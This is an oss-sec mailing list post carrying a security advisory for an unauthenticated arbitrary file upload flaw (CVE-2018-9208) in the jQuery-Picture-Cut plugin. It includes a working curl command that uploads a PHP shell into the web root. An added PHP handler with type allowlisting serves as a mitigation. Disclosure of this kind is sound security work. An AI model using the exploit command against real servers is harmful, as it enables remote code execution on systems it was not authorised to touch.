oss-sec mailing list archives

Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 20 Nov 2018 17:05:41 -0500

Title: Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta
Author: Larry W. Cashdollar, @_larry0
Date: 2018-11-02
CVE-ID: CVE-2018-9208
CWE: CWE-434 arbitrary file upload
Download Site: https://github.com/TuyoshiVinicius/jQuery-Picture-Cut
Vendor: http://picturecut.tuyoshi.com.br/
Vendor Notified: 2018-11-03
Vendor Contact: tuyoshi_vinicius () hotmail com
Advisory: http://www.vapidlabs.com/advisory.php?v=207

Description: Picture Cut is a jQuery plugin that handles images in a very friendly and simple way, with a beautiful
interface based on Bootstrap or jQuery UI. It has great features like AJAX upload, drag image from explorer, image crop
and others.

Vulnerability:
The code in jQuery-Picture-Cut/src/php/upload.php, which calls ../core/PictureCut.php to handle the file upload, does not
check the file type and allows the user to choose the path where the file is stored. An unauthenticated user can upload
an executable PHP file to the server, allowing code execution.

Exploit Code:

1. curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" \
     -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" \
     -F "enableMaximumSize=0" -F "file=@shell.php" http://example.com/jQuery-Picture-Cut/src/php/upload.php

3. With folderOnServer=/ the shell will be in the main web directory path.
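
Mitigation sketch, added here as an example and not part of the original advisory or the plugin's code: an upload handler that closes both gaps named above by deciding the file type from the content and by never taking the storage path from the request. UPLOAD_DIR, MAX_BYTES, the ALLOWED map and store_image_upload() are hypothetical names; the form field "file" is the one used in the request above.

```php
<?php
// Added example, not jQuery-Picture-Cut code. All names below are assumptions.
const UPLOAD_DIR = '/var/www/uploads';  // fixed on the server; serve it with PHP execution disabled
const MAX_BYTES  = 2 * 1024 * 1024;     // size limit enforced by the server, not by a request field

// Allowlist: MIME type detected from the content => extension assigned by the server.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function store_image_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Type comes from the bytes, never from the client's file name or Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
    if ($ext === null || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image type');
    }

    // Server-generated name and extension; the client's file name is discarded,
    // so an upload can never be stored with a .php extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Request fields such as folderOnServer are deliberately never read.
header('Content-Type: application/json');
try {
    echo json_encode(['status' => true, 'file' => store_image_upload($_FILES['file'] ?? [])]);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo json_encode(['status' => false, 'error' => $e->getMessage()]);
}
```

The handler should also sit behind the application's authentication, since the advisory notes the original endpoint accepts requests from unauthenticated users.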



